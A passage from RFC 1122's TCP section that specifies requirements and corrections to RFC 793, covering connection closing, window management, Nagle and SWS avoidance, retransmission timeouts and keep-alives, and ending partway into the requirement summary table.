(b) There could be an arrow from SYN-RCVD state to LISTEN
state, conditioned on receiving a RST after a passive
open (see text page 70).

RFC1122 TRANSPORT LAYER -- TCP October 1989

(c) It is possible to go directly from FIN-WAIT-1 to the
TIME-WAIT state (see page 75 of the spec).

4.2.2.9 Initial Sequence Number Selection: RFC-793 Section
3.3, page 27

A TCP MUST use the specified clock-driven selection of
initial sequence numbers.

4.2.2.10 Simultaneous Open Attempts: RFC-793 Section 3.4, page
32

There is an error in Figure 8: the packet on line 7 should
be identical to the packet on line 5.

A TCP MUST support simultaneous open attempts.

DISCUSSION:
It sometimes surprises implementors that if two
applications attempt to simultaneously connect to each
other, only one connection is generated instead of two.
This was an intentional design decision; don't try to
"fix" it.

4.2.2.11 Recovery from Old Duplicate SYN: RFC-793 Section 3.4,
page 33

Note that a TCP implementation MUST keep track of whether a
connection has reached SYN_RCVD state as the result of a
passive OPEN or an active OPEN.

4.2.2.12 RST Segment: RFC-793 Section 3.4

A TCP SHOULD allow a received RST segment to include data.

DISCUSSION
It has been suggested that a RST segment could contain
ASCII text that encoded and explained the cause of the
RST. No standard has yet been established for such
data.

4.2.2.13 Closing a Connection: RFC-793 Section 3.5

A TCP connection may terminate in two ways: (1) the normal
TCP close sequence using a FIN handshake, and (2) an "abort"
in which one or more RST segments are sent and the
connection state is immediately discarded. If a TCP

RFC1122 TRANSPORT LAYER -- TCP October 1989

connection is closed by the remote site, the local
application MUST be informed whether it closed normally or
was aborted.

The normal TCP close sequence delivers buffered data
reliably in both directions. Since the two directions of a
TCP connection are closed independently, it is possible for
a connection to be "half closed," i.e., closed in only one
direction, and a host is permitted to continue sending data
in the open direction on a half-closed connection.

A host MAY implement a "half-duplex" TCP close sequence, so
that an application that has called CLOSE cannot continue to
read data from the connection. If such a host issues a
CLOSE call while received data is still pending in TCP, or
if new data is received after CLOSE is called, its TCP
SHOULD send a RST to show that data was lost.

When a connection is closed actively, it MUST linger in
TIME-WAIT state for a time 2xMSL (Maximum Segment Lifetime).
However, it MAY accept a new SYN from the remote TCP to
reopen the connection directly from TIME-WAIT state, if it:

(1) assigns its initial sequence number for the new
connection to be larger than the largest sequence
number it used on the previous connection incarnation,
and

(2) returns to TIME-WAIT state if the SYN turns out to be
an old duplicate.

DISCUSSION:
TCP's full-duplex data-preserving close is a feature
that is not included in the analogous ISO transport
protocol TP4.

Some systems have not implemented half-closed
connections, presumably because they do not fit into
the I/O model of their particular operating system. On
these systems, once an application has called CLOSE, it
can no longer read input data from the connection; this
is referred to as a "half-duplex" TCP close sequence.

The graceful close algorithm of TCP requires that the
connection state remain defined on (at least) one end
of the connection, for a timeout period of 2xMSL, i.e.,
4 minutes. During this period, the (remote socket,

RFC1122 TRANSPORT LAYER -- TCP October 1989

local socket) pair that defines the connection is busy
and cannot be reused. To shorten the time that a given
port pair is tied up, some TCPs allow a new SYN to be
accepted in TIME-WAIT state.

4.2.2.14 Data Communication: RFC-793 Section 3.7, page 40

Since RFC-793 was written, there has been extensive work on
TCP algorithms to achieve efficient data communication.
Later sections of the present document describe required and
recommended TCP algorithms to determine when to send data
(Section 4.2.3.4), when to send an acknowledgment (Section
4.2.3.2), and when to update the window (Section 4.2.3.3).

DISCUSSION:
One important performance issue is "Silly Window
Syndrome" or "SWS" [TCP:5], a stable pattern of small
incremental window movements resulting in extremely
poor TCP performance. Algorithms to avoid SWS are
described below for both the sending side (Section
4.2.3.4) and the receiving side (Section 4.2.3.3).

In brief, SWS is caused by the receiver advancing the
right window edge whenever it has any new buffer space
available to receive data and by the sender using any
incremental window, no matter how small, to send more
data [TCP:5]. The result can be a stable pattern of
sending tiny data segments, even though both sender and
receiver have a large total buffer space for the
connection. SWS can only occur during the transmission
of a large amount of data; if the connection goes
quiescent, the problem will disappear. It is caused by
typical straightforward implementation of window
management, but the sender and receiver algorithms
given below will avoid it.

Another important TCP performance issue is that some
applications, especially remote login to character-at-
a-time hosts, tend to send streams of one-octet data
segments. To avoid deadlocks, every TCP SEND call from
such applications must be "pushed", either explicitly
by the application or else implicitly by TCP. The
result may be a stream of TCP segments that contain one
data octet each, which makes very inefficient use of
the Internet and contributes to Internet congestion.
The Nagle Algorithm described in Section 4.2.3.4
provides a simple and effective solution to this
problem. It does have the effect of clumping

RFC1122 TRANSPORT LAYER -- TCP October 1989

characters over Telnet connections; this may initially
surprise users accustomed to single-character echo, but
user acceptance has not been a problem.

Note that the Nagle algorithm and the send SWS
avoidance algorithm play complementary roles in
improving performance. The Nagle algorithm discourages
sending tiny segments when the data to be sent
increases in small increments, while the SWS avoidance
algorithm discourages small segments resulting from the
right window edge advancing in small increments.

A careless implementation can send two or more
acknowledgment segments per data segment received. For
example, suppose the receiver acknowledges every data
segment immediately. When the application program
subsequently consumes the data and increases the
available receive buffer space again, the receiver may
send a second acknowledgment segment to update the
window at the sender. The extreme case occurs with
single-character segments on TCP connections using the
Telnet protocol for remote login service. Some
implementations have been observed in which each
incoming 1-character segment generates three return
segments: (1) the acknowledgment, (2) a one byte
increase in the window, and (3) the echoed character,
respectively.

4.2.2.15 Retransmission Timeout: RFC-793 Section 3.7, page 41

The algorithm suggested in RFC-793 for calculating the
retransmission timeout is now known to be inadequate; see
Section 4.2.3.1 below.

Recent work by Jacobson [TCP:7] on Internet congestion and
TCP retransmission stability has produced a transmission
algorithm combining "slow start" with "congestion
avoidance". A TCP MUST implement this algorithm.

If a retransmitted packet is identical to the original
packet (which implies not only that the data boundaries have
not changed, but also that the window and acknowledgment
fields of the header have not changed), then the same IP
Identification field MAY be used (see Section 3.2.1.5).

IMPLEMENTATION:
Some TCP implementors have chosen to "packetize" the
data stream, i.e., to pick segment boundaries when

RFC1122 TRANSPORT LAYER -- TCP October 1989

segments are originally sent and to queue these
segments in a "retransmission queue" until they are
acknowledged. Another design (which may be simpler) is
to defer packetizing until each time data is
transmitted or retransmitted, so there will be no
segment retransmission queue.

In an implementation with a segment retransmission
queue, TCP performance may be enhanced by repacketizing
the segments awaiting acknowledgment when the first
retransmission timeout occurs. That is, the
outstanding segments that fitted would be combined into
one maximum-sized segment, with a new IP Identification
value. The TCP would then retain this combined segment
in the retransmit queue until it was acknowledged.
However, if the first two segments in the
retransmission queue totalled more than one maximum-
sized segment, the TCP would retransmit only the first
segment using the original IP Identification field.

4.2.2.16 Managing the Window: RFC-793 Section 3.7, page 41

A TCP receiver SHOULD NOT shrink the window, i.e., move the
right window edge to the left. However, a sending TCP MUST
be robust against window shrinking, which may cause the
"useable window" (see Section 4.2.3.4) to become negative.

If this happens, the sender SHOULD NOT send new data, but
SHOULD retransmit normally the old unacknowledged data
between SND.UNA and SND.UNA+SND.WND. The sender MAY also
retransmit old data beyond SND.UNA+SND.WND, but SHOULD NOT
time out the connection if data beyond the right window edge
is not acknowledged. If the window shrinks to zero, the TCP
MUST probe it in the standard way (see next Section).

DISCUSSION:
Many TCP implementations become confused if the window
shrinks from the right after data has been sent into a
larger window. Note that TCP has a heuristic to select
the latest window update despite possible datagram
reordering; as a result, it may ignore a window update
with a smaller window than previously offered if
neither the sequence number nor the acknowledgment
number is increased.

RFC1122 TRANSPORT LAYER -- TCP October 1989

4.2.2.17 Probing Zero Windows: RFC-793 Section 3.7, page 42

Probing of zero (offered) windows MUST be supported.

A TCP MAY keep its offered receive window closed
indefinitely. As long as the receiving TCP continues to
send acknowledgments in response to the probe segments, the
sending TCP MUST allow the connection to stay open.

DISCUSSION:
It is extremely important to remember that ACK
(acknowledgment) segments that contain no data are not
reliably transmitted by TCP. If zero window probing is
not supported, a connection may hang forever when an
ACK segment that re-opens the window is lost.

The delay in opening a zero window generally occurs
when the receiving application stops taking data from
its TCP. For example, consider a printer daemon
application, stopped because the printer ran out of
paper.

The transmitting host SHOULD send the first zero-window
probe when a zero window has existed for the retransmission
timeout period (see Section 4.2.2.15), and SHOULD increase
exponentially the interval between successive probes.

DISCUSSION:
This procedure minimizes delay if the zero-window
condition is due to a lost ACK segment containing a
window-opening update. Exponential backoff is
recommended, possibly with some maximum interval not
specified here. This procedure is similar to that of
the retransmission algorithm, and it may be possible to
combine the two procedures in the implementation.

4.2.2.18 Passive OPEN Calls: RFC-793 Section 3.8

Every passive OPEN call either creates a new connection
record in LISTEN state, or it returns an error; it MUST NOT
affect any previously created connection record.

A TCP that supports multiple concurrent users MUST provide
an OPEN call that will functionally allow an application to
LISTEN on a port while a connection block with the same
local port is in SYN-SENT or SYN-RECEIVED state.

DISCUSSION:

RFC1122 TRANSPORT LAYER -- TCP October 1989

Some applications (e.g., SMTP servers) may need to
handle multiple connection attempts at about the same
time. The probability of a connection attempt failing
is reduced by giving the application some means of
listening for a new connection at the same time that an
earlier connection attempt is going through the three-
way handshake.

IMPLEMENTATION:
Acceptable implementations of concurrent opens may
permit multiple passive OPEN calls, or they may allow
"cloning" of LISTEN-state connections from a single
passive OPEN call.

4.2.2.19 Time to Live: RFC-793 Section 3.9, page 52

RFC-793 specified that TCP was to request the IP layer to
send TCP segments with TTL = 60. This is obsolete; the TTL
value used to send TCP segments MUST be configurable. See
Section 3.2.1.7 for discussion.

4.2.2.20 Event Processing: RFC-793 Section 3.9

While it is not strictly required, a TCP SHOULD be capable
of queueing out-of-order TCP segments. Change the "may" in
the last sentence of the first paragraph on page 70 to
"should".

DISCUSSION:
Some small-host implementations have omitted segment
queueing because of limited buffer space. This
omission may be expected to adversely affect TCP
throughput, since loss of a single segment causes all
later segments to appear to be "out of sequence".

In general, the processing of received segments MUST be
implemented to aggregate ACK segments whenever possible.
For example, if the TCP is processing a series of queued
segments, it MUST process them all before sending any ACK
segments.

Here are some detailed error corrections and notes on the
Event Processing section of RFC-793.

(a) CLOSE Call, CLOSE-WAIT state, p. 61: enter LAST-ACK
state, not CLOSING.

(b) LISTEN state, check for SYN (pp. 65, 66): With a SYN

RFC1122 TRANSPORT LAYER -- TCP October 1989

bit, if the security/compartment or the precedence is
wrong for the segment, a reset is sent. The wrong form
of reset is shown in the text; it should be:

(c) SYN-SENT state, Check for SYN, p. 68: When the
connection enters ESTABLISHED state, the following
variables must be set:
SND.WND <- SEG.WND
SND.WL1 <- SEG.SEQ
SND.WL2 <- SEG.ACK

(d) Check security and precedence, p. 71: The first heading
"ESTABLISHED STATE" should really be a list of all
states other than SYN-RECEIVED: ESTABLISHED, FIN-WAIT-
1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, LAST-ACK, and
TIME-WAIT.

(e) Check SYN bit, p. 71: "In SYN-RECEIVED state and if
the connection was initiated with a passive OPEN, then
return this connection to the LISTEN state and return.
Otherwise...".

(f) Check ACK field, SYN-RECEIVED state, p. 72: When the
connection enters ESTABLISHED state, the variables
listed in (c) must be set.

(g) Check ACK field, ESTABLISHED state, p. 72: The ACK is a
duplicate if SEG.ACK =< SND.UNA (the = was omitted).
Similarly, the window should be updated if: SND.UNA =<
SEG.ACK =< SND.NXT.

(h) USER TIMEOUT, p. 77:

It would be better to notify the application of the
timeout rather than letting TCP force the connection
closed. However, see also Section 4.2.3.5.

4.2.2.21 Acknowledging Queued Segments: RFC-793 Section 3.9

A TCP MAY send an ACK segment acknowledging RCV.NXT when a
valid segment arrives that is in the window but not at the
left window edge.

RFC1122 TRANSPORT LAYER -- TCP October 1989

DISCUSSION:
RFC-793 (see page 74) was ambiguous about whether or
not an ACK segment should be sent when an out-of-order
segment was received, i.e., when SEG.SEQ was unequal to
RCV.NXT.

One reason for ACKing out-of-order segments might be to
support an experimental algorithm known as "fast
retransmit". With this algorithm, the sender uses the
"redundant" ACK's to deduce that a segment has been
lost before the retransmission timer has expired. It
counts the number of times an ACK has been received
with the same value of SEG.ACK and with the same right
window edge. If more than a threshold number of such
ACK's is received, then the segment containing the
octets starting at SEG.ACK is assumed to have been lost
and is retransmitted, without awaiting a timeout. The
threshold is chosen to compensate for the maximum
likely segment reordering in the Internet. There is
not yet enough experience with the fast retransmit
algorithm to determine how useful it is.

4.2.3 SPECIFIC ISSUES

4.2.3.1 Retransmission Timeout Calculation

A host TCP MUST implement Karn's algorithm and Jacobson's
algorithm for computing the retransmission timeout ("RTO").

o Jacobson's algorithm for computing the smoothed round-
trip ("RTT") time incorporates a simple measure of the
variance [TCP:7].

o Karn's algorithm for selecting RTT measurements ensures
that ambiguous round-trip times will not corrupt the
calculation of the smoothed round-trip time [TCP:6].

This implementation also MUST include "exponential backoff"
for successive RTO values for the same segment.
Retransmission of SYN segments SHOULD use the same algorithm
as data segments.

DISCUSSION:
There were two known problems with the RTO calculations
specified in RFC-793. First, the accurate measurement
of RTTs is difficult when there are retransmissions.
Second, the algorithm to compute the smoothed round-
trip time is inadequate [TCP:7], because it incorrectly

RFC1122 TRANSPORT LAYER -- TCP October 1989

assumed that the variance in RTT values would be small
and constant. These problems were solved by Karn's and
Jacobson's algorithm, respectively.

The performance increase resulting from the use of
these improvements varies from noticeable to dramatic.
Jacobson's algorithm for incorporating the measured RTT
variance is especially important on a low-speed link,
where the natural variation of packet sizes causes a
large variation in RTT. One vendor found link
utilization on a 9.6kb line went from 10% to 90% as a
result of implementing Jacobson's variance algorithm in
TCP.

The following values SHOULD be used to initialize the
estimation parameters for a new connection:

(a) RTT = 0 seconds.

(b) RTO = 3 seconds. (The smoothed variance is to be
initialized to the value that will result in this RTO).

The recommended upper and lower bounds on the RTO are known
to be inadequate on large internets. The lower bound SHOULD
be measured in fractions of a second (to accommodate high
speed LANs) and the upper bound should be 2*MSL, i.e., 240
seconds.

DISCUSSION:
Experience has shown that these initialization values
are reasonable, and that in any case the Karn and
Jacobson algorithms make TCP behavior reasonably
insensitive to the initial parameter choices.

4.2.3.2 When to Send an ACK Segment

A host that is receiving a stream of TCP data segments can
increase efficiency in both the Internet and the hosts by
sending fewer than one ACK (acknowledgment) segment per data
segment received; this is known as a "delayed ACK" [TCP:5].

A TCP SHOULD implement a delayed ACK, but an ACK should not
be excessively delayed; in particular, the delay MUST be
less than 0.5 seconds, and in a stream of full-sized
segments there SHOULD be an ACK for at least every second
segment.

DISCUSSION:

RFC1122 TRANSPORT LAYER -- TCP October 1989

A delayed ACK gives the application an opportunity to
update the window and perhaps to send an immediate
response. In particular, in the case of character-mode
remote login, a delayed ACK can reduce the number of
segments sent by the server by a factor of 3 (ACK,
window update, and echo character all combined in one
segment).

In addition, on some large multi-user hosts, a delayed
ACK can substantially reduce protocol processing
overhead by reducing the total number of packets to be
processed [TCP:5]. However, excessive delays on ACK's
can disturb the round-trip timing and packet "clocking"
algorithms [TCP:7].

4.2.3.3 When to Send a Window Update

A TCP MUST include a SWS avoidance algorithm in the receiver
[TCP:5].

IMPLEMENTATION:
The receiver's SWS avoidance algorithm determines when
the right window edge may be advanced; this is
customarily known as "updating the window". This
algorithm combines with the delayed ACK algorithm (see
Section 4.2.3.2) to determine when an ACK segment
containing the current window will really be sent to
the receiver. We use the notation of RFC-793; see
Figures 4 and 5 in that document.

The solution to receiver SWS is to avoid advancing the
right window edge RCV.NXT+RCV.WND in small increments,
even if data is received from the network in small
segments.

Suppose the total receive buffer space is RCV.BUFF. At
any given moment, RCV.USER octets of this total may be
tied up with data that has been received and
acknowledged but which the user process has not yet
consumed. When the connection is quiescent, RCV.WND =
RCV.BUFF and RCV.USER = 0.

Keeping the right window edge fixed as data arrives and
is acknowledged requires that the receiver offer less
than its full buffer space, i.e., the receiver must
specify a RCV.WND that keeps RCV.NXT+RCV.WND constant
as RCV.NXT increases. Thus, the total buffer space
RCV.BUFF is generally divided into three parts:

RFC1122 TRANSPORT LAYER -- TCP October 1989

|<------- RCV.BUFF ---------------->|
1 2 3
----|---------|------------------|------|----
RCV.NXT ^
(Fixed)

1 - RCV.USER = data received but not yet consumed;
2 - RCV.WND = space advertised to sender;
3 - Reduction = space available but not yet
advertised.

The suggested SWS avoidance algorithm for the receiver
is to keep RCV.NXT+RCV.WND fixed until the reduction
satisfies:

RCV.BUFF - RCV.USER - RCV.WND >=

min( Fr * RCV.BUFF, Eff.snd.MSS )

where Fr is a fraction whose recommended value is 1/2,
and Eff.snd.MSS is the effective send MSS for the
connection (see Section 4.2.2.6). When the inequality
is satisfied, RCV.WND is set to RCV.BUFF-RCV.USER.

Note that the general effect of this algorithm is to
advance RCV.WND in increments of Eff.snd.MSS (for
realistic receive buffers: Eff.snd.MSS < RCV.BUFF/2).
Note also that the receiver must use its own
Eff.snd.MSS, assuming it is the same as the sender's.

4.2.3.4 When to Send Data

A TCP MUST include a SWS avoidance algorithm in the sender.

A TCP SHOULD implement the Nagle Algorithm [TCP:9] to
coalesce short segments. However, there MUST be a way for
an application to disable the Nagle algorithm on an
individual connection. In all cases, sending data is also
subject to the limitation imposed by the Slow Start
algorithm (Section 4.2.2.15).

DISCUSSION:
The Nagle algorithm is generally as follows:

If there is unacknowledged data (i.e., SND.NXT >
SND.UNA), then the sending TCP buffers all user

RFC1122 TRANSPORT LAYER -- TCP October 1989

data (regardless of the PSH bit), until the
outstanding data has been acknowledged or until
the TCP can send a full-sized segment (Eff.snd.MSS
bytes; see Section 4.2.2.6).

Some applications (e.g., real-time display window
updates) require that the Nagle algorithm be turned
off, so small data segments can be streamed out at the
maximum rate.

IMPLEMENTATION:
The sender's SWS avoidance algorithm is more difficult
than the receivers's, because the sender does not know
(directly) the receiver's total buffer space RCV.BUFF.
An approach which has been found to work well is for
the sender to calculate Max(SND.WND), the maximum send
window it has seen so far on the connection, and to use
this value as an estimate of RCV.BUFF. Unfortunately,
this can only be an estimate; the receiver may at any
time reduce the size of RCV.BUFF. To avoid a resulting
deadlock, it is necessary to have a timeout to force
transmission of data, overriding the SWS avoidance
algorithm. In practice, this timeout should seldom
occur.

The "useable window" [TCP:5] is:

U = SND.UNA + SND.WND - SND.NXT

i.e., the offered window less the amount of data sent
but not acknowledged. If D is the amount of data
queued in the sending TCP but not yet sent, then the
following set of rules is recommended.

Send data:

(1) if a maximum-sized segment can be sent, i.e, if:

min(D,U) >= Eff.snd.MSS;

(2) or if the data is pushed and all queued data can
be sent now, i.e., if:

[SND.NXT = SND.UNA and] PUSHED and D <= U

(the bracketed condition is imposed by the Nagle
algorithm);

RFC1122 TRANSPORT LAYER -- TCP October 1989

(3) or if at least a fraction Fs of the maximum window
can be sent, i.e., if:

[SND.NXT = SND.UNA and]

min(D.U) >= Fs * Max(SND.WND);

(4) or if data is PUSHed and the override timeout
occurs.

Here Fs is a fraction whose recommended value is 1/2.
The override timeout should be in the range 0.1 - 1.0
seconds. It may be convenient to combine this timer
with the timer used to probe zero windows (Section
4.2.2.17).

Finally, note that the SWS avoidance algorithm just
specified is to be used instead of the sender-side
algorithm contained in [TCP:5].

4.2.3.5 TCP Connection Failures

Excessive retransmission of the same segment by TCP
indicates some failure of the remote host or the Internet
path. This failure may be of short or long duration. The
following procedure MUST be used to handle excessive
retransmissions of data segments [IP:11]:

(a) There are two thresholds R1 and R2 measuring the amount
of retransmission that has occurred for the same
segment. R1 and R2 might be measured in time units or
as a count of retransmissions.

(b) When the number of transmissions of the same segment
reaches or exceeds threshold R1, pass negative advice
(see Section 3.3.1.4) to the IP layer, to trigger
dead-gateway diagnosis.

(c) When the number of transmissions of the same segment
reaches a threshold R2 greater than R1, close the
connection.

(d) An application MUST be able to set the value for R2 for
a particular connection. For example, an interactive
application might set R2 to "infinity," giving the user
control over when to disconnect.

RFC1122 TRANSPORT LAYER -- TCP October 1989

(d) TCP SHOULD inform the application of the delivery
problem (unless such information has been disabled by
the application; see Section 4.2.4.1), when R1 is
reached and before R2. This will allow a remote login
(User Telnet) application program to inform the user,
for example.

The value of R1 SHOULD correspond to at least 3
retransmissions, at the current RTO. The value of R2 SHOULD
correspond to at least 100 seconds.

An attempt to open a TCP connection could fail with
excessive retransmissions of the SYN segment or by receipt
of a RST segment or an ICMP Port Unreachable. SYN
retransmissions MUST be handled in the general way just
described for data retransmissions, including notification
of the application layer.

However, the values of R1 and R2 may be different for SYN
and data segments. In particular, R2 for a SYN segment MUST
be set large enough to provide retransmission of the segment
for at least 3 minutes. The application can close the
connection (i.e., give up on the open attempt) sooner, of
course.

DISCUSSION:
Some Internet paths have significant setup times, and
the number of such paths is likely to increase in the
future.

4.2.3.6 TCP Keep-Alives

Implementors MAY include "keep-alives" in their TCP
implementations, although this practice is not universally
accepted. If keep-alives are included, the application MUST
be able to turn them on or off for each TCP connection, and
they MUST default to off.

Keep-alive packets MUST only be sent when no data or
acknowledgement packets have been received for the
connection within an interval. This interval MUST be
configurable and MUST default to no less than two hours.

It is extremely important to remember that ACK segments that
contain no data are not reliably transmitted by TCP.
Consequently, if a keep-alive mechanism is implemented it
MUST NOT interpret failure to respond to any specific probe
as a dead connection.

RFC1122 TRANSPORT LAYER -- TCP October 1989

An implementation SHOULD send a keep-alive segment with no
data; however, it MAY be configurable to send a keep-alive
segment containing one garbage octet, for compatibility with
erroneous TCP implementations.

DISCUSSION:
A "keep-alive" mechanism periodically probes the other
end of a connection when the connection is otherwise
idle, even when there is no data to be sent. The TCP
specification does not include a keep-alive mechanism
because it could: (1) cause perfectly good connections
to break during transient Internet failures; (2)
consume unnecessary bandwidth ("if no one is using the
connection, who cares if it is still good?"); and (3)
cost money for an Internet path that charges for
packets.

Some TCP implementations, however, have included a
keep-alive mechanism. To confirm that an idle
connection is still active, these implementations send
a probe segment designed to elicit a response from the
peer TCP. Such a segment generally contains SEG.SEQ =
SND.NXT-1 and may or may not contain one garbage octet
of data. Note that on a quiet connection SND.NXT =
RCV.NXT, so that this SEG.SEQ will be outside the
window. Therefore, the probe causes the receiver to
return an acknowledgment segment, confirming that the
connection is still live. If the peer has dropped the
connection due to a network partition or a crash, it
will respond with a RST instead of an acknowledgment
segment.

Unfortunately, some misbehaved TCP implementations fail
to respond to a segment with SEG.SEQ = SND.NXT-1 unless
the segment contains data. Alternatively, an
implementation could determine whether a peer responded
correctly to keep-alive packets with no garbage data
octet.

A TCP keep-alive mechanism should only be invoked in
server applications that might otherwise hang
indefinitely and consume resources unnecessarily if a
client crashes or aborts a connection during a network
failure.

RFC1122 TRANSPORT LAYER -- TCP October 1989

4.2.3.7 TCP Multihoming

If an application on a multihomed host does not specify the
local IP address when actively opening a TCP connection,
then the TCP MUST ask the IP layer to select a local IP
address before sending the (first) SYN. See the function
GET_SRCADDR() in Section 3.4.

At all other times, a previous segment has either been sent
or received on this connection, and TCP MUST use the same
local address is used that was used in those previous
segments.

4.2.3.8 IP Options

When received options are passed up to TCP from the IP
layer, TCP MUST ignore options that it does not understand.

A TCP MAY support the Time Stamp and Record Route options.

An application MUST be able to specify a source route when
it actively opens a TCP connection, and this MUST take
precedence over a source route received in a datagram.

When a TCP connection is OPENed passively and a packet
arrives with a completed IP Source Route option (containing
a return route), TCP MUST save the return route and use it
for all segments sent on this connection. If a different
source route arrives in a later segment, the later
definition SHOULD override the earlier one.

4.2.3.9 ICMP Messages

TCP MUST act on an ICMP error message passed up from the IP
layer, directing it to the connection that created the
error. The necessary demultiplexing information can be
found in the IP header contained within the ICMP message.

o Source Quench

TCP MUST react to a Source Quench by slowing
transmission on the connection. The RECOMMENDED
procedure is for a Source Quench to trigger a "slow
start," as if a retransmission timeout had occurred.

o Destination Unreachable -- codes 0, 1, 5

Since these Unreachable messages indicate soft error

RFC1122 TRANSPORT LAYER -- TCP October 1989

conditions, TCP MUST NOT abort the connection, and it
SHOULD make the information available to the
application.

DISCUSSION:
TCP could report the soft error condition directly
to the application layer with an upcall to the
ERROR_REPORT routine, or it could merely note the
message and report it to the application only when
and if the TCP connection times out.

o Destination Unreachable -- codes 2-4

These are hard error conditions, so TCP SHOULD abort
the connection.

o Time Exceeded -- codes 0, 1

This should be handled the same way as Destination
Unreachable codes 0, 1, 5 (see above).

o Parameter Problem

This should be handled the same way as Destination
Unreachable codes 0, 1, 5 (see above).

4.2.3.10 Remote Address Validation

A TCP implementation MUST reject as an error a local OPEN
call for an invalid remote IP address (e.g., a broadcast or
multicast address).

An incoming SYN with an invalid source address must be
ignored either by TCP or by the IP layer (see Section
3.2.1.3).

A TCP implementation MUST silently discard an incoming SYN
segment that is addressed to a broadcast or multicast
address.

4.2.3.11 TCP Traffic Patterns

IMPLEMENTATION:
The TCP protocol specification [TCP:1] gives the
implementor much freedom in designing the algorithms
that control the message flow over the connection --
packetizing, managing the window, sending

RFC1122 TRANSPORT LAYER -- TCP October 1989

acknowledgments, etc. These design decisions are
difficult because a TCP must adapt to a wide range of
traffic patterns. Experience has shown that a TCP
implementor needs to verify the design on two extreme
traffic patterns:

o Single-character Segments

Even if the sender is using the Nagle Algorithm,
when a TCP connection carries remote login traffic
across a low-delay LAN the receiver will generally
get a stream of single-character segments. If
remote terminal echo mode is in effect, the
receiver's system will generally echo each
character as it is received.

o Bulk Transfer

When TCP is used for bulk transfer, the data
stream should be made up (almost) entirely of
segments of the size of the effective MSS.
Although TCP uses a sequence number space with
byte (octet) granularity, in bulk-transfer mode
its operation should be as if TCP used a sequence
space that counted only segments.

Experience has furthermore shown that a single TCP can
effectively and efficiently handle these two extremes.

The most important tool for verifying a new TCP
implementation is a packet trace program. There is a
large volume of experience showing the importance of
tracing a variety of traffic patterns with other TCP
implementations and studying the results carefully.

4.2.3.12 Efficiency

IMPLEMENTATION:
Extensive experience has led to the following
suggestions for efficient implementation of TCP:

(a) Don't Copy Data

In bulk data transfer, the primary CPU-intensive
tasks are copying data from one place to another
and checksumming the data. It is vital to
minimize the number of copies of TCP data. Since

RFC1122 TRANSPORT LAYER -- TCP October 1989

the ultimate speed limitation may be fetching data
across the memory bus, it may be useful to combine
the copy with checksumming, doing both with a
single memory fetch.

(b) Hand-Craft the Checksum Routine

A good TCP checksumming routine is typically two
to five times faster than a simple and direct
implementation of the definition. Great care and
clever coding are often required and advisable to
make the checksumming code "blazing fast". See
[TCP:10].

(c) Code for the Common Case

TCP protocol processing can be complicated, but
for most segments there are only a few simple
decisions to be made. Per-segment processing will
be greatly speeded up by coding the main line to
minimize the number of decisions in the most
common case.

4.2.4 TCP/APPLICATION LAYER INTERFACE

4.2.4.1 Asynchronous Reports

There MUST be a mechanism for reporting soft TCP error
conditions to the application. Generically, we assume this
takes the form of an application-supplied ERROR_REPORT
routine that may be upcalled [INTRO:7] asynchronously from
the transport layer:

ERROR_REPORT(local connection name, reason, subreason)

The precise encoding of the reason and subreason parameters
is not specified here. However, the conditions that are
reported asynchronously to the application MUST include:

* ICMP error message arrived (see 4.2.3.9)

* Excessive retransmissions (see 4.2.3.5)

* Urgent pointer advance (see 4.2.2.4).

However, an application program that does not want to
receive such ERROR_REPORT calls SHOULD be able to

RFC1122 TRANSPORT LAYER -- TCP October 1989

effectively disable these calls.

DISCUSSION:
These error reports generally reflect soft errors that
can be ignored without harm by many applications. It
has been suggested that these error report calls should
default to "disabled," but this is not required.

4.2.4.2 Type-of-Service

The application layer MUST be able to specify the Type-of-
Service (TOS) for segments that are sent on a connection.
It not required, but the application SHOULD be able to
change the TOS during the connection lifetime. TCP SHOULD
pass the current TOS value without change to the IP layer,
when it sends segments on the connection.

The TOS will be specified independently in each direction on
the connection, so that the receiver application will
specify the TOS used for ACK segments.

TCP MAY pass the most recently received TOS up to the
application.

DISCUSSION
Some applications (e.g., SMTP) change the nature of
their communication during the lifetime of a
connection, and therefore would like to change the TOS
specification.

Note also that the OPEN call specified in RFC-793
includes a parameter ("options") in which the caller
can specify IP options such as source route, record
route, or timestamp.

4.2.4.3 Flush Call

Some TCP implementations have included a FLUSH call, which
will empty the TCP send queue of any data for which the user
has issued SEND calls but which is still to the right of the
current send window. That is, it flushes as much queued
send data as possible without losing sequence number
synchronization. This is useful for implementing the "abort
output" function of Telnet.

RFC1122 TRANSPORT LAYER -- TCP October 1989

4.2.4.4 Multihoming

The user interface outlined in sections 2.7 and 3.8 of RFC-
793 needs to be extended for multihoming. The OPEN call
MUST have an optional parameter:

OPEN( ... [local IP address,] ... )

to allow the specification of the local IP address.

DISCUSSION:
Some TCP-based applications need to specify the local
IP address to be used to open a particular connection;
FTP is an example.

IMPLEMENTATION:
A passive OPEN call with a specified "local IP address"
parameter will await an incoming connection request to
that address. If the parameter is unspecified, a
passive OPEN will await an incoming connection request
to any local IP address, and then bind the local IP
address of the connection to the particular address
that is used.

For an active OPEN call, a specified "local IP address"
parameter will be used for opening the connection. If
the parameter is unspecified, the networking software
will choose an appropriate local IP address (see
Section 3.3.4.2) for the connection

4.2.5 TCP REQUIREMENT SUMMARY

| | | | |S| |
| | | | |H| |F
| | | | |O|M|o
| | |S| |U|U|o
| | |H| |L|S|t
| |M|O| |D|T|n
| |U|U|M| | |o
| |S|L|A|N|N|t
| |T|D|Y|O|O|t
FEATURE |SECTION | | | |T|T|e
-------------------------------------------------|--------|-|-|-|-|-|--
| | | | | | |
Push flag | | | | | | |
Aggregate or queue un-pushed data |4.2.2.2 | | |x| | |
Sender collapse successive PSH flags |4.2.2.2 | |x| | | |
SEND call can specify PUSH |4.2.2.2 | | |x| | |

RFC1122 TRANSPORT LAYER -- TCP October 1989

If cannot: sender buffer indefinitely |4.2.2.2 | | | | |x|
If cannot: PSH last segment |4.2.2.2 |x| | | | |
Notify receiving ALP of PSH |4.2.2.2 | | |x| | |1
Send max size segment when possible |4.2.2.2 | |x| | | |
| | | | | | |
Window | | | | | | |
Treat as unsigned number |4.2.2.3 |x| | | | |
Handle as 32-bit number |4.2.2.3 | |x| | | |
Shrink window from right |4.2.2.16| | | |x| |
Robust against shrinking window |4.2.2.16|x| | | | |
Receiver's window closed indefinitely |4.2.2.17| | |x| | |
Sender probe zero window |4.2.2.17|x| | | | |
First probe after RTO |4.2.2.17| |x| | | |
Exponential backoff |4.2.2.17| |x| | | |
Allow window stay zero indefinitely |4.2.2.17|x| | | | |
Sender timeout OK conn with zero wind |4.2.2.17| | | | |x|
| | | | | | |
